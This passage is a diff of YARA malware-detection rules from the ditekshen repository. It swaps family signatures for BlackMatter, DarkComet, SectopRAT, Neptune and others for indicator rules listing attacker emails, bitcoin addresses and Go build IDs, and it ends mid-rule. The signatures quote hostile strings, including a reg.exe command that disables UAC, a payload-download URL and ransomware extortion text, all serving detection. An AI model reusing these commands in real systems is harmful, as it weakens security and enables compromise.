+		id = "00cf99da-ff3c-5c91-8966-69a8afc8613a"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7722-L7746"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L582-L592"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bcb1188d616b29fa535e757a37476435a3061d27e143339413f6829876701868"
+		logic_hash = "a2b6106fc49dd254ca936e285fa0c2a3aee7110832686638d20d369d77f6c48f"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "exec_pipe:%s" ascii
-		$s2 = "Error InitAPI !!!" fullword ascii
-		$s3 = "No Files Found !!!" fullword ascii
-		$s4 = "Error open log File:%s" fullword ascii
-		$s5 = "%ld - Files Found  " fullword ascii
-		$s6 = "Total VM run on host:" fullword ascii
-		$s7 = "error:%d open:%s" fullword ascii
-		$s8 = "work.log" fullword ascii
-		$s9 = "esxcli vm process kill" ascii
-		$s10 = "readdir64" fullword ascii
-		$s11 = "%s_%d.block" fullword ascii
-		$s12 = "EVP_EncryptFinal_ex" fullword ascii
-		$s13 = ".README_TO_RESTORE" fullword ascii
-		$m1 = "COMPROMISED AND YOUR SENSITIVE PRIVATE INFORMATION WAS STOLEN" ascii nocase
-		$m2 = "damage them without special software" ascii nocase
-		$m3 = "leaking or being sold" ascii nocase
-		$m4 = "Data will be Published and/or Sold" ascii nocase
+		$s1 = "WayneEvenson@protonmail.com" ascii wide nocase
+		$s2 = "WayneEvenson@tutanota.com" ascii wide nocase
+		$s3 = "14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 6 of ( $s* ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) or 8 of them )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Blackmatter : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockdown
 {
 	meta:
-		description = "Detects BlackMatter ransomware"
-		author = "ditekSHen"
-		id = "8883e652-edab-5cbf-a4fa-963b437447d9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects files referencing identities associated with LockDown / cantopen ransomware"
+		author = "ditekShen"
+		id = "603f0113-d77b-590c-b2a0-804c6d1fbfbc"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7748-L7767"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L594-L603"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4558002b424f7102f67fc44dfc37ac20f6013e25ae827c6aee0fc37231e2fa72"
+		logic_hash = "cb17bb92d6e8189a08508481b75d301a1227906815c684753859914d77d7b3e7"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "C:\\Windows\\System32\\*.drv" fullword wide
-		$s2 = "NYbr-Vk@" fullword ascii
-		$s3 = ":7:=:H:Q:W:\\:b:&;O;^;v;" fullword ascii
-		$o1 = { b0 34 aa fe c0 e2 fb b9 03 }
-		$o2 = { fe 00 ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 }
-		$o3 = { 6a 00 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe ff }
-		$o4 = { ff 75 08 ff 75 0c ff b5 d8 fe ff ff ff b5 dc fe }
-		$o5 = { 53 56 57 8d 85 70 ff ff ff 83 c0 0f 83 e0 f0 89 }
-		$o6 = { c7 85 68 ff ff ff 00 04 00 00 8b 85 6c ff ff ff }
+		$s1 = "CCWhite@onionmail.org" ascii wide nocase
+		$s2 = "bc1q6ug0vrxz66d564qznclu9yyyvn6zurskezmt64" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and all of ( $o* ) )
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector04 : FILE
+rule DITEKSHEN_INDICATOR_KB_LNK_BOI_MAC : FILE
 {
 	meta:
-		description = "Detects downloader / injector"
+		description = "Detects Windows Shortcut .lnk files with previously known bad Birth Object ID and MAC address combination"
 		author = "ditekSHen"
-		id = "fe423aee-6ff4-5fd0-9fa2-51dd0c27f54b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bfef07dc-a368-5119-82dd-de2096b17dd1"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7769-L7790"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L605-L637"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab9a047e53dec2cc5986522636783b5cb8aae7fc0297292d017ec22ee5750cce"
+		logic_hash = "31a7966a0ea0fca363d2b926b06c8acbdae0c24dd2156389196255dbbf4ed662"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "Runner" fullword ascii
-		$s2 = "DownloadPayload" fullword ascii
-		$s3 = "RunOnStartup" fullword ascii
-		$a1 = "Antis" fullword ascii
-		$a2 = "antiVM" fullword ascii
-		$a3 = "antiSandbox" fullword ascii
-		$a4 = "antiDebug" fullword ascii
-		$a5 = "antiEmulator" fullword ascii
-		$a6 = "enablePersistence" fullword ascii
-		$a7 = "enableFakeError" fullword ascii
-		$a8 = "DetectVirtualMachine" fullword ascii
-		$a9 = "DetectSandboxie" fullword ascii
-		$a10 = "DetectDebugger" fullword ascii
-		$a11 = "CheckEmulator" fullword ascii
+		$boi1 = { 2C ED AC EC 94 7A E8 11 9F DE 00 0C 29 A1 A9 40 }
+		$boi2 = { 3F 54 89 18 46 CB E8 11 BD 0E 08 00 27 6D D5 D9 }
+		$boi3 = { DE 63 02 FE 57 A2 E8 11 92 E8 5C F3 70 8B 16 F2 }
+		$boi4 = { C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A }
+		$boi5 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
+		$boi6 = { E4 51 EC 20 66 61 EA 11 85 CD B2 FC 36 31 EE 21 }
+		$boi7 = { 6E DD CE 86 0F 07 90 4B AF 18 38 2F 97 FB 53 62 }
+		$boi8 = { 25 41 87 AE F1 D2 EA 11 93 97 00 50 56 C0 00 08 }
+		$boi9 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
+		$boi10 = { 5C 46 EC 05 A6 60 EB 11 85 EB 8C 16 45 31 19 7F }
+		$boi11 = { 30 8B 17 86 9B 35 C5 40 A7 9D 48 5C D6 3D F3 5C }
+		$boi12 = { E5 21 1D 04 9D A4 E9 11 A9 37 00 0C 29 0F 29 89 }
+		$boi13 = { 34 5F AC 8A 4E CE ED 4D 8E 55 83 8E EA 24 B3 4E }
+		$boi14 = { 49 77 25 3B D6 E1 EB 11 9C BB 00 D8 61 85 FD 9F }
+		$mac1 = { 00 0C 29 A1 A9 40 }
+		$mac2 = { 08 00 27 6D D5 D9 }
+		$mac3 = { 5C F3 70 8B 16 F2 }
+		$mac4 = { 00 0C 29 5A 39 04 }
+		$mac5 = { B2 FC 36 31 EE 21 }
+		$mac6 = { 00 50 56 C0 00 08 }
+		$mac7 = { 8C 16 45 31 19 7F }
+		$mac8 = { 00 0C 29 0F 29 89 }
+		$mac9 = { 00 D8 61 85 FD 9F }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 5 of ( $a* ) ) or 10 of ( $a* ) )
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize < 3KB and ( 1 of ( $boi* ) and 1 of ( $mac* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Darkcomet : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Powershellwifistealer
 {
 	meta:
-		description = "Detects DarkComet"
-		author = "ditekSHen"
-		id = "ae2412df-adae-5640-9404-7b093c5095b4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects email accounts used for exfiltration observed in PowerShellWiFiStealer"
+		author = "ditekShen"
+		id = "fa19e422-c682-5464-b034-330942daf3bd"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7792-L7812"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L691-L704"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "444df3c914c47500018614af10036864b459e7873daf079b684352dbe52f0486"
+		logic_hash = "f119b54032e2a6ca35819e811e6479b00936115d98ef6e928f4c819d04a8321f"
 		score = 75
-		quality = 25
-		tags = "FILE"
+		quality = 63
+		tags = ""
 
 	strings:
-		$s1 = "%s, ClassID: %s" ascii
-		$s2 = "%s, ProgID: \"%s\"" ascii
-		$s3 = "#KCMDDC51#" ascii
-		$s4 = "#BOT#VisitUrl" ascii
-		$s5 = "#BOT#OpenUrl" ascii
-		$s6 = "#BOT#Ping" ascii
-		$s7 = "#BOT#RunPrompt" ascii
-		$s8 = "#BOT#CloseServer" ascii
-		$s9 = "#BOT#SvrUninstall" ascii
-		$s10 = "#BOT#URLUpdate" ascii
-		$s11 = "#BOT#URLDownload" ascii
-		$s12 = /BTRESULT(Close|Download|HTTP|Mass|Open|Ping\|Respond|Run|Syn|UDP|Uninstall\|uninstall|Update|Visit)/ ascii
-		$s13 = "dclogs\\" fullword ascii
+		$s1 = "hajdebebreidekreide@gmail.com" ascii wide nocase
+		$s2 = "usb@pterobot.net" ascii wide nocase
+		$s3 = "umairdadaber@gmail.com" ascii wide nocase
+		$s4 = "mrumairok@gmail.com" ascii wide nocase
+		$s5 = "credsenderbot@gmail.com" ascii wide nocase
+		$s6 = "easywareytb@gmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Macoute : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Powershellcookiestealer
 {
 	meta:
-		description = "Detects Macoute"
-		author = "ditekSHen"
-		id = "0ecfb923-2e51-544e-984d-efdeeb175727"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects email accounts used for exfiltration observed in PowerShellCookieStealer"
+		author = "ditekShen"
+		id = "c2bbb9a8-3e4c-5676-9676-2708a196ef8d"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7814-L7836"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L706-L715"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1dffa48fe6c0ac053509b5f5994d323fd72d090da0f077b52c9bc33df6997964"
+		logic_hash = "bd404e94939acb92dd56a7d2a1f7536bcb3f520ca1e9dc614b53828afbc6dac8"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "scp%s%s%s%s" ascii
-		$s2 = "putfile %s %s" ascii
-		$s3 = "pscp|%s|%s:%s" ascii
-		$s4 = "connect %host %port\\n" ascii
-		$s5 = "/ecoute/spool/%s-%lu" ascii
-		$s6 = "<f n=\"%s\" s=\"%lu\" d=\"%d-%d-%d\"/>" ascii
-		$s7 = "CMPT;%s;%s;%s;%s;%s" ascii
-		$s8 = "%s\\apoScreen%lu.dll" ascii
-		$s9 = "/cap/%s%lu.jpg" ascii
-		$s10 = "INFO;%u;%u;%u;%d;%d;%d;%d;%d;%d;%d;%s" ascii
-		$s11 = "SUBJECT: %s is comming!" ascii
-		$s12 = "Content-type: multipart/mixed; boundary=\"#BOUNDARY#\"" ascii
-		$s13 = "FROM: %s@yahoo.com" ascii
-		$s14 = "<html><script language=\"JavaScript\">window.open(\"readme.eml\", null,\"resizable=no,top=6000,left=6000\")</script></html>" ascii
-		$s15 = "<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>" ascii
+		$s1 = "senmn0w@gmail.com" ascii wide nocase
+		$s2 = "mohamed.trabelsi.ena2@gmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 10 of them
+		any of them
 }
-rule DITEKSHEN_MALWARE_Win_Coinminer04 : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Zebrocy : FILE
 {
 	meta:
-		description = "Detects coinmining malware"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "d90d8ad3-20b7-5bb4-8c58-3488c60ed9a2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "fc805e9d-47a0-5fcb-9b21-4806c13ab7b4"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7838-L7858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1541-L1550"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2ef60dbf0bac3d5910635bb011a45e5ebc1392094b10425604fa9dd290198f8b"
+		logic_hash = "16b88460896012b42ca576995f5de98a7a9d2fcc53f8e148427bca31a883d19b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "createDll" fullword ascii
-		$s2 = "getTasks" fullword ascii
-		$s3 = "SetStartup" fullword ascii
-		$s4 = "loadUrl" fullword ascii
-		$s5 = "Processer" fullword ascii
-		$s6 = "checkProcess" fullword ascii
-		$s7 = "runProcess" fullword ascii
-		$s8 = "createDir" fullword ascii
-		$cnc1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
-		$cnc2 = "?hwid=" fullword wide
-		$cnc3 = "?timeout=1" fullword wide
-		$cnc4 = "&completed=" fullword wide
-		$cnc5 = "/cmd.php" wide
+		$s1 = "Go build ID: \"l6RAKXh3Wg1yzn63nita/b2_Y0DGY05NFWuZ_4gUT/H91sCRktnyyYVzECfvvA/l8f-yII0L_miSjIe-VQu\"" ascii
+		$s2 = "Go build ID: \"fiGGvLVFcvIhuJsSaail/jLt9TEPQiusg7IpRkp4H/hlcoXZIfsl1D4521LqEL/yL8dN86mCNc39WqQTgGn\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) and 1 of ( $cnc* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Sidewalk : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gostealer : FILE
 {
 	meta:
-		description = "Detects SideWalk"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "ab82b83a-a279-555a-83c2-6340431b10da"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "25c0eb8b-c69c-5f50-b622-daaa3c8c62a4"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7860-L7880"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1552-L1562"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6885a1ad69d61fa5875ee0db949071e84390fc2db4307c412b32cd17c0806f6a"
+		logic_hash = "d548bc2580c8e8233a5fcdf85b947547c10f2c4d0056d14e990f30dd7b9a0672"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Decommit" fullword ascii
-		$s2 = "Shellc0deRunner" fullword ascii
-		$s3 = "shellc0de" fullword ascii
-		$s4 = "C:\\Windows\\System32\\msdt.exe" fullword wide
-		$s5 = "StartProcessWOPid" fullword ascii
-		$s6 = "StartProcessWithParent" fullword ascii
-		$m1 = "alloctype" fullword ascii
-		$m2 = "ThreadIoPriority" fullword ascii
-		$m3 = "PebAddress" fullword ascii
-		$m4 = "dotnet.4.x64.dll" fullword wide
-		$m5 = "LogonNetCredentialsOnly" fullword ascii
-		$m6 = "ThreadIdealProcessor" fullword ascii
-		$m7 = "LogonWithProfile" fullword ascii
+		$s1 = "Go build ID: \"xQV-b1Fr7d576TTTpbXi/gq4FgVQqMcg--9tmY13y/76rKNEUBENlDFDcecmm_/mbw17A_6WrROaNCYDEQF\"" ascii
+		$s2 = "Go build ID: \"x4VqrSSsx8iysxVdfB-z/gIF3p7SUxiZsVgTuq7bN/93XHuILGnGYq2L83fRpj/eoY6nTqwk1sdMHTaXzlw\"" ascii
+		$s3 = "Go build ID: \"BPRThIYWbHcZQQ4K1y2t/2mO0-FjLC50P0QZuMTgC/9i6TYw_akiEF9ZPN0s3p/s1XoqXr7EyXMDVw5TTP3\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $m* ) or ( 11 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Vanillarat : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Goldenaxe : FILE
 {
 	meta:
-		description = "Detects VanillaRAT"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "70c2cd1a-a6d4-562e-a6fc-c16a9e87c6b7"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e734d5b4-2332-5b46-a05e-fb35134ea070"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7882-L7902"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1564-L1573"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7b90ac88a50693ec4bb0676c04f5d161f04f67970ea60d80e79d774da75bfdc"
+		logic_hash = "4ab9aeaa74530de4a62ddfa8d7e8607e455d0ba4330260037327bec6d8d7abab"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$stub = "VanillaStub." ascii wide
-		$s1 = "Client.Send: " wide
-		$s2 = "Connected to chat" fullword wide
-		$s3 = "GetStoredPasswords" fullword wide
-		$s4 = "Started screen locker." fullword wide
-		$s5 = "[<\\MOUSE>]" fullword wide
-		$s6 = "YOUR SCREEN HAS BEEN LOCKED!" fullword wide
-		$s7 = "record recsound" fullword wide
-		$f1 = "<StartRemoteDestkop>d__" ascii
-		$f2 = "<ConnectLoop>d__" ascii
-		$f3 = "<Scan0>k__" ascii
-		$f4 = "<RemoteShellActive>k__" ascii
-		$f5 = "KillClient" fullword ascii
+		$s1 = "Go build ID: \"BrJuyMRdiZ7pC9Cah0is/rbDB__hXWimivbSGiCLi/B35SPLQwHal3ccR2gXNx/hEmVzhJWWatsrKwnENh_\"" ascii
+		$s2 = "Go build ID: \"5bgieaBe9PcZCZf23WFp/bCZ0AUHYlqQmX8GJASV6/fGxRLMDDYrTm1jcLMt8j/Wof3n5634bwiwLHFKHTn\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $stub and ( 2 of ( $s* ) or 2 of ( $f* ) ) ) or 6 of ( $s* ) or all of ( $f* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Sectoprat : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nemty : FILE
 {
 	meta:
-		description = "Detects SectopRAT"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "d6594834-24d7-5e86-84b5-5a7920e7bc89"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "512fe910-e38c-513c-b678-a0592bdc4ae2"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7904-L7929"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1575-L1588"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4048f837c02560a8b650247173be25893b466e5cec8f2784eea58172f973822"
+		logic_hash = "246766ab1d2871b5c22323f622d39ce9fa9b46a2d43bace122ed5549484f3aac"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\\\.\\root\\cimv2:Win32_Process" wide
-		$s2 = "\\\\.\\root\\cimv2:CIM_DataFile.Name=" wide
-		$s3 = "^.*(?=Windows)" fullword wide
-		$s4 = "C:\\Windows\\System32\\cmd.exe" wide
-		$s5 = "C:\\Windows\\explorer.exe" wide
-		$s6 = "Disabling IE protection" wide
-		$s7 = "stream started succces" wide
-		$b1 = "/C start Firefox" wide
-		$b2 = "/C start chrome" wide
-		$b3 = "/C start iexplore" wide
-		$m1 = "DefWindowProc" fullword ascii
-		$m2 = "AuthStream" fullword ascii
-		$m3 = "KillBrowsers" fullword ascii
-		$m4 = "GetAllNetworkInterfaces" fullword ascii
-		$m5 = "EnumDisplayDevices" fullword ascii
-		$m6 = "RemoteClient.Packets" fullword ascii
-		$m7 = "IServerPacket" fullword ascii
-		$m8 = "keybd_event" fullword ascii
+		$s1 = "Go build ID: \"R6dvaUktgv2SjVXDoMdo/kKgwagwoLRC88DpIXAmx/eipNq7_PQCTCOhZ6Q74q/RHJkCaNdTbd6qgYiA-EC\"" ascii
+		$s2 = "Go build ID: \"vsdndTwlj03gbEoDu06S/anJkXGh7N08537M0RMms/VG58d99axcdeD_z1JIko/tfDVbCdWUId-VX90kuT7\"" ascii
+		$s3 = "Go build ID: \"FG9JEesXBQ04oNCv2bIS/MmjCdGa3ogU_6DIz6bZR/AjrqKBSezDfY1t7U9xr-/-06dIpZsukiVcN0PtOCb\"" ascii
+		$s4 = "Go build ID: \"MJ8bS1emWrrlXiE_C61E/A6GaZzhLls_pFKMGfU1H/ZgswGQy_lzK-I4cZykwm/8JzjhV06jZosSa5Qih5O\"" ascii
+		$s5 = "Go build ID: \"_vQalVQKn2O8kxxA4vVM/slXlklhnjEF5tawjlPzW/t26rDRURK6ii0MqU7gIx/MNq6vj_uM15RhjVC2QuX\"" ascii
+		$s6 = "Go build ID: \"KWssFDTp6mq16xlI5c0t/mQLgof0oyp-eYKqNYUFL/Np8S71zE5W5_BsJCpjsj/hXpFDaVCtay2509R05fd\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $s* ) and 2 of ( $b* ) ) or all of ( $s* ) or ( all of ( $b* ) and ( 4 of ( $s* ) or 5 of ( $m* ) ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Neptune : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Qnapcrypt : FILE
 {
 	meta:
-		description = "Detects Neptune keylogger / infostealer"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "0f619bea-f00b-5078-95a4-83306e3e87b4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "4cdea15f-d8fd-5720-ba25-eb60e9b0f9ce"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7931-L7953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1590-L1598"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3298bf55f89180ed7e9f7ad35b59d39284a5143fd69fa2a4fbc27d91fb2fbd3"
+		logic_hash = "b3ee583c395701350c091041a72f988d1b5ae607b642b42152fcda29f9be63e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "your keylogger has been freshly installed on" wide
-		$x2 = "Attached is a screenshot of the victim" wide
-		$x3 = "color: rgb(2, 84, 138);'>Project Neptune</span><br>" wide
-		$x4 = ">{Monitor Everything}</span><br><br>" wide
-		$x5 = "[First Run] Neptune" wide
-		$x6 = "Neptune - " wide
-		$s1 = "Melt" fullword wide
-		$s2 = "Hide" fullword wide
-		$s3 = "SDDate+" fullword wide
-		$s4 = "DelOff+" fullword wide
-		$s5 = "MsgFalse+" fullword wide
-		$s6 = "Clipboard:" fullword wide
-		$s7 = "information is valid and working!" wide
-		$s8 = ".exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" wide
-		$s9 = "http://www.exampleserver.com/directfile.exe" fullword wide
+		$s1 = "Go build ID: \"XcBqbQohm7UevdYNABvs/2RcJz1616naXSRu2xvTX/b6F3Jt1-5WAIexSyzeun/MpHqs5fJA5G2D9gVuUCe\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Tomiris : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Snatch : FILE
 {
 	meta:
-		description = "Detects Tomiris"
+		description = "Detects Golang Build IDs in known bad samples"
 		author = "ditekSHen"
-		id = "86efd4fb-3c76-504e-b367-132aee59e09a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6ab6b7bc-c905-5ff9-8059-a2d512ba13b3"
+		date = "2021-01-21"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7955-L7978"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1600-L1610"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1d9baeb6db2e849dd053c3fc735984e23b9cead39cf166f8a544ee5a439185d1"
+		logic_hash = "5a19c791ed0d829c4c97e35cfa604a8716bad3f02632712903d765db95ba87f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$f1 = "main.workPath" ascii
-		$f2 = "main.selfName" ascii
-		$f3 = "main.infoServerAddr" ascii
-		$f4 = "main.configFileName" ascii
-		$s1 = "C:/Projects/go/src/Tomiris/main.go" ascii
-		$s2 = "C:/GO/go1.16.2/src/os/user/lookup_windows.go" ascii
-		$s3 = "C:\\GO\\go1.16.2" ascii
-		$s4 = ".html.jpeg.json.wasm.webp/p/gf/p/kk1562515" ascii
-		$s5 = "\" /ST 10:00alarm clockassistQueueavx512vbmi2avx512vnniwbad" ascii
-		$s6 = "write /TR \" Value addr= alloc base  code= ctxt: curg= free  goid  jobs= list= m->p=" ascii
-		$t1 = "SCHTASKS /DELETE /F /TN \"%s\"" ascii
-		$t2 = "SCHTASKS /CREATE /SC DAILY /TN" ascii
-		$t3 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"%s\" /ST %s" ascii
-		$t4 = "SCHTASKS /CREATE /SC ONCE /TN \"%s\" /TR \"'%s' %s\" /ST %s" ascii
-		$r1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones" ascii
-		$r2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii
